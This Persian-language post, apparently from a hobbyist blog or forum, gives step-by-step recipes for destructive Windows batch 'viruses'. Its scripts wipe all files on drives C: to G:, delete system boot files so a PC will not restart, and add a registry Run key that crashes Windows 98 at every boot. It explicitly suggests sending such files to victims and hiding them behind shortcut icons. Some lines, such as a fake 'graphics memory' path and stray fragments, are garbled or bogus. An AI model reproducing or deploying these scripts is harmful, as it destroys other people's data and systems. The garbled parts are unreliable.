اما اين ويروس بسيار خطرناك است چون با اجرا شدن آن ديگر براي قرباني راهي جز اف ديسك كردن كامپيوتر باقي نمي ماند. مواظب باشيد اشتباها روي آن دابل كليك نكنيد.

هرگونه استفاده غير متعارف از اين ويروس به عهده كاربر مي باشد.

متن ويروس:

 ATTRIB -a -s -h -r c

 ATTRIB -a -s -h -r c:\windows\*.*

 Echo y | echo a | Echo y | del c:\*.*

 Echo y | echo a | Echo y | del d:\*.*

 Echo y | echo a | Echo y | del e:\*.*

 Echo y | echo a | Echo y | del f:\*.*

 Echo y | echo a | Echo y | del g:\*.*

 echo y | copy *.* C:\

 echo y | copy *.* D:\

 echo y | copy *.* E:\

 echo y | copy *.* F:\

 echo y | copy *.* G:\

 resrart 

 اين مطالب را داخل نت پد بنويسيد و با پسوند bat سيو كنيد.

شبه ويروس:

اگه ويندوز 98 داريد بريد تو Run و تايپ كنيد Con/Con : چيزى كه مشاهده خواهيد كرد همون صفحه آبى رنگ ويندوز! هيچ چاره اى جر restart كردن رو براتون باقى نمىگذاره.حالا چه جورى مي تونيم از اين باگ كه در ويندوز98 موجود است استفاده كنيم.يكى از راهاش اينه كه در ييك صفحه اينترنت اين دستور را وارد كنيم كه اين فايل را از كامپيوتر فراخوانى كند بدين صورت file:///c:/con/con مىتونيد از اين باگ يه فايل درست كنيد كه وقتى كسى اين فايل رو اجرا كرد هر بار كه كامپيوترش اين فايل فراخوانى بشه و راهى بجر فرمت رو براش پيش رو نگذاره يه صفحه يtxt باز كنيد و اين دستورات رو توش بنويسيد و با پسوند .REG سيو كنيد

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

@="c:\\con\\con"

اين باعث ميشه كه باهر بار ريستارت كردن كامپيوتر اين دستور اجرا بشه و نهايتا همون صفحه آبى رنگ بياد كه راهى جز restart كردن نداره.اگر ويندوز NT /200 / XP مىتونيد يه كار ديگه بكنيد يه صفحه يtxt ‌‌باز كنيد بعد اين كاممند ها رو بتوش بنويسيد

c:

del autoexec.bat

del config.sys

cd winnt

del system.ini

del win.ini

بعد فايل رو با پسوند .BAT سيو كنيد. اين فايل رو وقتى براى كسى بفرستيد هيچى نمىشه اما به محض اينكه كامپيوتر رو restart كنه ديگه بار ديگه بالا نمياد.

فكر مي كنم همه شما ويروس Blaster رو بشناسيد (ويروسي كه باعث Shutdown شدن كامپيوتر تو 60 ثانيه مي شد و مي شه) و حتي خيلي از شما روش ساخت اون را بدونيد ولي لازم ميدونم نگاهي سريع به اون بندازم.

اين ويروس رو به طرق مختلفي و با دستورات گوناگوني مي شه نوشت كه در اين جا دو روش رو مورد بررسي قرار ميديم

اگر از اين دستورات از قبل آشنايي نداريد حتما از Copy/Paste استفاده كنيد.

روش اول

با استفاده از Shortcut:در جايي از دسكتاپ خود Right Click كنيد و در بخش New گزينه Shortcut را انتخاب كنيد و در بخش ظاهر شده يكي از دستورات زير را وارد كنيد:

1)shutdown -s -t xx

2)%windir%system32shutdown.exe -s -t xx

توضيح: بعد از اينكه Paste كرديد به جاي xx در دستورات بالا مدت زماني را بر حسب ثانيه قرار دهيد تا كامپيوتر پس از آن زمان خاموش شود.

سپس Next را بزنيد و براي فايل خود يك نام برگزينيد و كار تمام است.

روش دوم

به كمك Notepad : نت پد را باز كنيد و باز هم يكي از دو دستور بالا را در آن Paste كنيد و حالا فايل خود را با پسوند bat يعني با نامي مثل shutdown.bat سيو كنيد. براي پادزهر درست كردن براي اين ويروس هم ميتوانيد از دستور زير استفاده كنيد:

shutdown -a

و همه مراحل قبل را انجام دهيد.اين دستور هم از هر دو راه فوق قابل اجرا است. حالا ميرسيم به نكات تكميلي در مورد چگونه ميتوان براي BatchFile ها آيكون انتخاب كرد. بايد بگويم يكي از ساده ترين روشها كه به هيچ نرم افزار خاصي نياز ندارد اين است كه شما از BatchFile مورد نظر يك Shortcut بسازيد و براي Shortcut براحتي آيكون انتخاب كنيد و فايل اصلي را Hidden كنيد.

تا به حال هيچ به اين فكر افتاده ايد كه اگر در كامپيوتري Notepad و Wordpad و Microsoft Word نصب نشده باشد شما اين همه ترفند را كجا ميخواهيد پياده كنيد. آيا ميدانيد هكرها معمولا در محيط متني ديگري بجز اينها اقدام به نوشن برنامه ميكنند؟ بله اين محيط متني به نسبت ناشناخته همان اديتور داس (Dos Editor) است. شما در اين اديتور ميتوانيد كد برنامه ها را ببينيد. براي وارد شدن به اين محيط وارد داس شويد و تايپ كنيد Edit. صبر كنيد. قبل از اينكه وارد اين محيط شويد بايد بدانيد بر خلاف محيط بي آزار نت پد محيط Dos Editor بسيار بسيار خطرناك است. هرگونه تغييري كه خواسته يا ناخواسته در متن كد ها بوجود آوريد امكان هيچگونه بازگشت ندارد (اينجا از كليدي به نام Undo خبري نيست.) همچنين همه تغييرات بطور خودكار سيو ميشود و هيچگاه موقع خروج از اديتور ازشما سوال نميشود كه Do you want to save changes و همه چيز بطور خودكار ذخيره شده و اگر احيانا كد فايل هاي اصلي سيستم را دستكاري كنيد حتي System Restore و Backup هاي رجيستري هم به دادتان نخواهند رسيد.

cpu-567njkblaster بعد با پسوند bat. سيو كنيد.

خطر: يك بار روي سيستم خودتون امتحان نكنيد.

توضيح در باره ويروس: اين ويروس فضاي كارد گرافيك رو پر ميكنه و ديگه هيچ بازي رو سيستم اجرا نميشه.ك نت پد باز كنيد و در آن تايپ كنيد :

c/windows/system32/jefo/display/memory/full

و براي save كردنش گزينه file رو زده و save as... رو انتخاب كنيد و اونو با اسم XXX.bat ذخيره كنيد اكنون ويروس شما آماده ميباشد.